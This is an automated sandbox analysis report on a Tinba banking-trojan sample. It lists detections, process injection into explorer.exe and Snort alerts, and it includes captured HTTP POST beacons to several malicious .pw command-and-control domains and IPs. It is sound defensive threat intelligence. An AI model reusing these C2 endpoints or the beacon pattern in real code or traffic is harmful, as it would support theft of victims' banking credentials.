Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
java.exe

Overview

General Information

Sample name:java.exe
Analysis ID:1378065
MD5:b471d5f706df69a4a28664d7e335a9da
SHA1:995a757d4562d9f4e8231f359b4b78db2de1c1f0
SHA256:223534841809356aa7c94f86e8b0f4d6b4ce317b8225b419b27a5ba320ab0b81
Tags:exetinba
Infos:

Detection

Tinba
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Tinba Banker
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Exploit detected, runtime environment starts unknown processes
Hooks files or directories query functions (used to hide files and directories)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • java.exe (PID: 7340 cmdline: C:\Users\user\Desktop\java.exe MD5: B471D5F706DF69A4A28664D7E335A9DA)
    • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • winver.exe (PID: 7396 cmdline: winver MD5: B5471B0FB5402FC318C82C994C6BF84D)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • bin.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe" MD5: CC18A03FCBC9DCF9DF31B64689EB3E55)
          • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bin.exe (PID: 7924 cmdline: "C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe" MD5: CC18A03FCBC9DCF9DF31B64689EB3E55)
          • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3528 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 3832 cmdline: ctfmon.exe MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • svchost.exe (PID: 4196 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • StartMenuExperienceHost.exe (PID: 4660 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
      • RuntimeBroker.exe (PID: 4872 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SearchApp.exe (PID: 4984 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
      • RuntimeBroker.exe (PID: 5092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • smartscreen.exe (PID: 5584 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
      • TextInputHost.exe (PID: 3788 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
      • RuntimeBroker.exe (PID: 5116 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 1532 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • ApplicationFrameHost.exe (PID: 5736 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
      • WinStore.App.exe (PID: 2524 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
      • RuntimeBroker.exe (PID: 1760 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SystemSettings.exe (PID: 6060 cmdline: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel MD5: 3CD3CD85226FCF576DFE9B70B6DA2630)
      • UserOOBEBroker.exe (PID: 3924 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
      • svchost.exe (PID: 5428 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dllhost.exe (PID: 1440 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • cscript.exe (PID: 5956 cmdline: "cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus MD5: CB601B41D4C8074BE8A84AED564A94DC)
      • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • backgroundTaskHost.exe (PID: 2504 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
      • RuntimeBroker.exe (PID: 5820 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 404 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • BjCNEZCMnwLaEEzWr.exe (PID: 3288 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 1104 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 1608 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 5356 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 5324 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 4584 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 3140 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 648 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • BjCNEZCMnwLaEEzWr.exe (PID: 2124 cmdline: "C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
TinbaF-Secure notes that TinyBanker or short Tinba is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe.If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user's browser activity and if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc in the legitimate-looking page.Tinba may also display socially-engineered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.tinba

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: java.exe PID: 7340JoeSecurity_TinbaYara detected Tinba BankerJoe Security
    Process Memory Space: winver.exe PID: 7396JoeSecurity_TinbaYara detected Tinba BankerJoe Security
      Process Memory Space: explorer.exe PID: 2580JoeSecurity_TinbaYara detected Tinba BankerJoe Security
        Process Memory Space: sihost.exe PID: 3420JoeSecurity_TinbaYara detected Tinba BankerJoe Security
          Process Memory Space: svchost.exe PID: 3456JoeSecurity_TinbaYara detected Tinba BankerJoe Security
            Click to see the 6 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:192.168.2.4216.218.185.16249742802020418 01/20/24-20:41:48.295231
            SID:2020418
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249742802830613 01/20/24-20:41:48.295231
            SID:2830613
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249738802830613 01/20/24-20:41:42.359145
            SID:2830613
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249738802024659 01/20/24-20:41:42.359145
            SID:2024659
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249743802830613 01/20/24-20:41:49.827227
            SID:2830613
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249738802020418 01/20/24-20:41:42.359145
            SID:2020418
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249739802020418 01/20/24-20:41:43.842659
            SID:2020418
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249739802024659 01/20/24-20:41:43.842659
            SID:2024659
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249741802024659 01/20/24-20:41:46.905610
            SID:2024659
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249735802020418 01/20/24-20:41:33.804089
            SID:2020418
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249740802020418 01/20/24-20:41:45.528112
            SID:2020418
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249735802024659 01/20/24-20:41:33.804089
            SID:2024659
            Source Port:49735
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4178.62.201.3449736802024659 01/20/24-20:41:39.347423
            SID:2024659
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249737802020418 01/20/24-20:41:40.938841
            SID:2020418
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249740802024659 01/20/24-20:41:45.528112
            SID:2024659
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249743802024659 01/20/24-20:41:49.827227
            SID:2024659
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249741802020418 01/20/24-20:41:46.905610
            SID:2020418
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249743802020418 01/20/24-20:41:49.827227
            SID:2020418
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249742802024659 01/20/24-20:41:48.295231
            SID:2024659
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249739802830613 01/20/24-20:41:43.842659
            SID:2830613
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4178.62.201.3449736802020418 01/20/24-20:41:39.347423
            SID:2020418
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.4216.218.185.16249737802024659 01/20/24-20:41:40.938841
            SID:2024659
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: java.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://spaines.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://uyhgqunqkxnx.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://evbsdqvgmpph.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://cmnsgscccrej.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://mfueeimvyrsp.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://gfnlmtcolrrb.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://vcklmnnejwxx.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Source: http://fkmmvfeonnyh.pw/EiDQjNbWEQ/Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeAvira: detection malicious, Label: HEUR/AGEN.1322420
            Multi AV Scanner detection for domain / URL
            Source: vcklmnnejwxx.pwVirustotal: Detection: 14%Perma Link
            Source: uyhgqunqkxnx.pwVirustotal: Detection: 13%Perma Link
            Source: mfueeimvyrsp.pwVirustotal: Detection: 17%Perma Link
            Source: cmnsgscccrej.pwVirustotal: Detection: 13%Perma Link
            Source: utmyhnffxpcj.pwVirustotal: Detection: 17%Perma Link
            Source: spaines.pwVirustotal: Detection: 15%Perma Link
            Source: fkmmvfeonnyh.pwVirustotal: Detection: 17%Perma Link
            Source: gfnlmtcolrrb.pwVirustotal: Detection: 13%Perma Link
            Source: evbsdqvgmpph.pwVirustotal: Detection: 16%Perma Link
            Source: http://uyhgqunqkxnx.pw/EiDQjNbWEQ/Virustotal: Detection: 13%Perma Link
            Source: http://cmnsgscccrej.pw/EiDQjNbWEQ/Virustotal: Detection: 17%Perma Link
            Source: http://evbsdqvgmpph.pw/EiDQjNbWEQ/Virustotal: Detection: 15%Perma Link
            Source: http://mfueeimvyrsp.pw/EiDQjNbWEQ/Virustotal: Detection: 9%Perma Link
            Source: http://spaines.pw/EiDQjNbWEQ/Virustotal: Detection: 11%Perma Link
            Source: http://gfnlmtcolrrb.pw/EiDQjNbWEQ/Virustotal: Detection: 15%Perma Link
            Source: http://fkmmvfeonnyh.pw/EiDQjNbWEQ/Virustotal: Detection: 16%Perma Link
            Source: http://vcklmnnejwxx.pw/EiDQjNbWEQ/Virustotal: Detection: 11%Perma Link
            Multi AV Scanner detection for submitted file
            Source: java.exeReversingLabs: Detection: 89%
            Source: java.exeVirustotal: Detection: 89%Perma Link
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\0C0BC82C\bin.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: java.exeJoe Sandbox ML: detected
            Source: C:\Windows\SysWOW64\winver.exeCode function: 2_2_03392DCF CryptAcquireContextA,CryptImportPublicKeyInfo,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,2_2_03392DCF
            Source: java.exeBinary or memory string: -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAldMoUs9Ytg4Z6u+LBejj XsQpi94U2CbOGCF5DieMHxzcr5nhleioQixxAah9IEXJgzZ8Ag69xjMADnuKMumV xOFw6SbeOhRGrT/al5Rv/X56bsKPBBn5UAR5xhzUielXM77Z8R0oKVOKfXYDXdMq hx6FPFOOnV4/H7u3zf0sUbHXjbJEamXSjWRd0O
            Source: java.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49730 version: TLS 1.2

            Software Vulnerabilities

            barindex
            Exploit detected, runtime environment starts unknown processes
            Source: C:\Users\user\Desktop\java.exeProcess created: C:\Windows\System32\conhost.exe

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49735 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49735 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49736 -> 178.62.201.34:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49736 -> 178.62.201.34:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49737 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49737 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49738 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49738 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49738 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49739 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49739 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49739 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49740 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49740 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49741 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49741 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49742 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49742 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49742 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49743 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49743 -> 216.218.185.162:80
            Source: TrafficSnort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49743 -> 216.218.185.162:80
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: spaines.pwContent-Length: 157Data Raw: 71 72 15 f5 52 7a 15 f5 1a ea 4f 98 77 70 14 d6 41 42 25 c5 41 42 25 c5 Data Ascii: qrRzOwpAB%AB%
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: uyhgqunqkxnx.pwContent-Length: 157Data Raw: 17 36 54 98 31 3e 54 98 7c ae 0e f5 11 34 55 bb 27 06 64 a8 27 06 64 a8 Data Ascii: 6T1>T|4U'd'd
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: vcklmnnejwxx.pwContent-Length: 157Data Raw: 46 b7 57 5a 61 bf 57 5a 2d 2f 0d 37 40 b5 56 79 76 87 67 6a 76 87 67 6a Data Ascii: FWZaWZ-/7@Vyvgjvgj
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: cmnsgscccrej.pwContent-Length: 157Data Raw: 8a 6a 6e 07 a2 62 6e 07 e1 f2 34 6a 8c 68 6f 24 ba 5a 5e 37 ba 5a 5e 37 Data Ascii: jnbn4jho$Z^7Z^7
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: evbsdqvgmpph.pwContent-Length: 157Data Raw: c9 d0 3a ba e1 d8 3a ba a2 48 60 d7 cf d2 3b 99 f9 e0 0a 8a f9 e0 0a 8a Data Ascii: ::H`;
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: mfueeimvyrsp.pwContent-Length: 157Data Raw: 4a 7b a7 87 63 73 a7 87 21 e3 fd ea 4c 79 a6 a4 7a 4b 97 b7 7a 4b 97 b7 Data Ascii: J{cs!LyzKzK
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: utmyhnffxpcj.pwContent-Length: 157Data Raw: ce a6 09 2f e4 ae 09 2f a5 3e 53 42 c8 a4 08 0c fe 96 39 1f fe 96 39 1f Data Ascii: //>SB99
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: fkmmvfeonnyh.pwContent-Length: 157Data Raw: fc 54 53 d8 d6 5c 53 d8 97 cc 09 b5 fa 56 52 fb cc 64 63 e8 cc 64 63 e8 Data Ascii: TS\SVRdcdc
            Source: global trafficHTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0Host: gfnlmtcolrrb.pwContent-Length: 157Data Raw: b3 59 ba 92 98 51 ba 92 d8 c1 e0 ff b5 5b bb b1 83 69 8a a2 83 69 8a a2 Data Ascii: YQ[ii
            Source: Joe Sandbox ViewIP Address: 216.218.185.162 216.218.185.162
            Source: Joe Sandbox ViewASN Name: HURRICANEUS HURRICANEUS
            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A4109000CC6X-BM-CBT: 1696420817X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 60X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A4109000CC6X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-tX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2237Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
